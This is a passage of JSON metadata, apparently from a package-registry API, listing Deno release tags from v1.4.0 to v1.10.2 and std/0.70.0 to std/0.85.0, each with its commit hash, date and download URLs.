5ee38e645c2aea31aea3e9a81e17f3","kind":"commit","published_at":"2021-05-17T15:28:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.10.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.10.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.10.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.2/manifests"},{"name":"v1.10.1","sha":"1cd1419e18386d512ab98849d132117182545b89","kind":"commit","published_at":"2021-05-12T03:11:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.10.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.10.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.10.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.1/manifests"},{"name":"v1.10.0","sha":"57927781ed7eb8bb088d656768dc295716407c7a","kind":"commit","published_at":"2021-05-12T00:06:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.10.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.0/manifests"},{"name":"v1.9.2","sha":"8074d8bcf3cdcc7e9a08df147e0082798a7c2760","kind":"commit","published_at":"2021-04-23T14:08:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.9.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.9.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.2/manifests"},{"name":"v1.9.1","sha":"7760d9a669552e69211b101d4656662a3dddf8dd","kind":"commit","published_at":"2021-04-20T23:46:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.9.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.1/manifests"},{"name":"v1.9.0","sha":"262ee78592209a1f8e449cfa1308dca9688a414e","kind":"commit","published_at":"2021-04-13T18:11:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.9.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.0/manifests"},{"name":"v1.8.3","sha":"2e6b78be9095cc38c392e2477711ff6eec226704","kind":"commit","published_at":"2021-04-02T10:10:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.8.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.8.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.8.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.3/manifests"},{"name":"v1.8.2","sha":"f50ed4e281e6c30120412271eb66a1fb67d1c63e","kind":"commit","published_at":"2021-03-21T20:12:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.8.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.8.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.8.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.2/manifests"},{"name":"v1.8.1","sha":"8d3baa7777b6bd2a2631e1b87a4676b520f2b447","kind":"commit","published_at":"2021-03-09T20:55:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.8.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.8.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.1/manifests"},{"name":"v1.8.0","sha":"18b894072d3eb6b04016e77ece0d78512f7ffca1","kind":"commit","published_at":"2021-03-02T23:23:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.8.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.0/manifests"},{"name":"v1.7.5","sha":"e9669bf0656c2478416f6705ff218539dc42c126","kind":"commit","published_at":"2021-02-19T14:58:34.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.5/manifests"},{"name":"v1.7.4","sha":"d2d7dc8d675d70f0061bdaf99ae4a08d84156aa9","kind":"commit","published_at":"2021-02-13T13:20:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.4/manifests"},{"name":"v1.7.3","sha":"f67b06939be5b754ecee306e9da1d7c0779c3cd6","kind":"commit","published_at":"2021-02-12T16:37:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.3/manifests"},{"name":"v1.7.2","sha":"647f11b3acc2f629a6d77836f5f6ef74ee10c4ce","kind":"commit","published_at":"2021-02-05T19:33:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.2/manifests"},{"name":"v1.7.1","sha":"11dd6f201378fe04cccadb46b7054cc2f791dda8","kind":"commit","published_at":"2021-01-29T14:53:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.1/manifests"},{"name":"std/0.85.0","sha":"11dd6f201378fe04cccadb46b7054cc2f791dda8","kind":"commit","published_at":"2021-01-29T14:53:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.85.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.85.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.85.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.85.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.85.0/manifests"},{"name":"v1.7.0","sha":"0f7a02500c0abdaae4ecfa89259c026c624773a9","kind":"commit","published_at":"2021-01-20T05:24:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.0/manifests"},{"name":"std/0.84.0","sha":"0f7a02500c0abdaae4ecfa89259c026c624773a9","kind":"commit","published_at":"2021-01-20T05:24:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.84.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.84.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.84.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.84.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.84.0/manifests"},{"name":"v1.6.3","sha":"b07a0b640d01d87c926a74d42e26a6561848c7c5","kind":"commit","published_at":"2020-12-30T15:13:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.6.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.6.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.6.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.3/manifests"},{"name":"std/0.83.0","sha":"b07a0b640d01d87c926a74d42e26a6561848c7c5","kind":"commit","published_at":"2020-12-30T15:13:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.83.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.83.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.83.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.83.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.83.0/manifests"},{"name":"v1.6.2","sha":"d199e45ad5dd180a6969abcd528023e173a1e1ff","kind":"commit","published_at":"2020-12-22T16:00:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.6.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.6.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.6.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.2/manifests"},{"name":"std/0.82.0","sha":"d199e45ad5dd180a6969abcd528023e173a1e1ff","kind":"commit","published_at":"2020-12-22T16:00:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.82.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.82.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.82.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.82.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.82.0/manifests"},{"name":"v1.6.1","sha":"b6d5ae1ecd125ce8a14cddc877cb66dbcfc9bb04","kind":"commit","published_at":"2020-12-14T20:25:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.6.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.6.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.6.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.1/manifests"},{"name":"std/0.81.0","sha":"b6d5ae1ecd125ce8a14cddc877cb66dbcfc9bb04","kind":"commit","published_at":"2020-12-14T20:25:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.81.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.81.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.81.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.81.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.81.0/manifests"},{"name":"v1.6.0","sha":"df87bf1d6a43ca36b520b45913839fd1f16df595","kind":"commit","published_at":"2020-12-08T14:37:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.6.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.0/manifests"},{"name":"std/0.80.0","sha":"df87bf1d6a43ca36b520b45913839fd1f16df595","kind":"commit","published_at":"2020-12-08T14:37:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.80.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.80.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.80.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.80.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.80.0/manifests"},{"name":"v1.5.4","sha":"bc79d556496420441977ca6f5c66be3dc3ded187","kind":"commit","published_at":"2020-11-23T14:10:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.4/manifests"},{"name":"std/0.79.0","sha":"bc79d556496420441977ca6f5c66be3dc3ded187","kind":"commit","published_at":"2020-11-23T14:10:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.79.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.79.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.79.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.79.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.79.0/manifests"},{"name":"v1.5.3","sha":"ab7b8ba8d15f37d6244784a16a3f4f3c96e38769","kind":"commit","published_at":"2020-11-16T10:14:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.3/manifests"},{"name":"std/0.78.0","sha":"ab7b8ba8d15f37d6244784a16a3f4f3c96e38769","kind":"commit","published_at":"2020-11-16T10:14:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.78.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.78.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.78.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.78.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.78.0/manifests"},{"name":"v1.5.2","sha":"71d7482577ee187187051ac8d9976a5387c038db","kind":"commit","published_at":"2020-11-08T23:58:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.2/manifests"},{"name":"std/0.77.0","sha":"71d7482577ee187187051ac8d9976a5387c038db","kind":"commit","published_at":"2020-11-08T23:58:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.77.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.77.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.77.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.77.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.77.0/manifests"},{"name":"v1.5.1","sha":"03769f11b5db314c550478852317d9ea108c2f76","kind":"commit","published_at":"2020-10-31T14:32:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.1/manifests"},{"name":"std/0.76.0","sha":"03769f11b5db314c550478852317d9ea108c2f76","kind":"commit","published_at":"2020-10-31T14:32:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.76.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.76.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.76.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.76.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.76.0/manifests"},{"name":"v1.5.0","sha":"dd01f206da0b7e1b305e70cdd3c98bf60fbefc5d","kind":"commit","published_at":"2020-10-27T15:00:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.0/manifests"},{"name":"std/0.75.0","sha":"dd01f206da0b7e1b305e70cdd3c98bf60fbefc5d","kind":"commit","published_at":"2020-10-27T15:00:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.75.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.75.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.75.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.75.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.75.0/manifests"},{"name":"v1.4.6","sha":"9e9ec9784a639ef7205e1e303301ee558439b045","kind":"commit","published_at":"2020-10-10T10:30:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.6","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.6/manifests"},{"name":"v1.4.5","sha":"b5e4b63a880ae41bd33dce5276c925ab7bd9519f","kind":"commit","published_at":"2020-10-08T12:20:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.5/manifests"},{"name":"std/0.74.0","sha":"b5e4b63a880ae41bd33dce5276c925ab7bd9519f","kind":"commit","published_at":"2020-10-08T12:20:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.74.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.74.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.74.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.74.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.74.0/manifests"},{"name":"v1.4.4","sha":"ae1ed2d16687413381fc7e6b55dca9b1676855f6","kind":"commit","published_at":"2020-10-03T12:58:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.4/manifests"},{"name":"std/0.73.0","sha":"ae1ed2d16687413381fc7e6b55dca9b1676855f6","kind":"commit","published_at":"2020-10-03T12:58:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.73.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.73.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.73.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.73.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.73.0/manifests"},{"name":"v1.4.3","sha":"63efa5f15dccf48d7a27f7d55344f1de63f786af","kind":"commit","published_at":"2020-10-02T12:37:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.3/manifests"},{"name":"std/0.72.0","sha":"63efa5f15dccf48d7a27f7d55344f1de63f786af","kind":"commit","published_at":"2020-10-02T12:37:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.72.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.72.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.72.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.72.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.72.0/manifests"},{"name":"v1.4.2","sha":"dacb340f8fe959ebf2949ff6e7480935556a9813","kind":"commit","published_at":"2020-09-25T14:53:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.2/manifests"},{"name":"std/0.71.0","sha":"dacb340f8fe959ebf2949ff6e7480935556a9813","kind":"commit","published_at":"2020-09-25T14:53:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.71.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.71.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.71.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.71.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.71.0/manifests"},{"name":"v1.4.1","sha":"d6f3de6feb006bf6911b938bfa43a3655c962c50","kind":"tag","published_at":"2020-09-18T19:40:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.1/manifests"},{"name":"std/0.70.0","sha":"d6f3de6feb006bf6911b938bfa43a3655c962c50","kind":"tag","published_at":"2020-09-18T19:38:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.70.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.70.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.70.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.70.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.70.0/manifests"},{"name":"v1.4.0","sha":"b3fa81f867f933df41f274bd8eec10dddf1b1b28","kind":"commit","published_at":"2020-09-13T14:35:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.0","tag_url":"https://repos.ecosyste.ms/a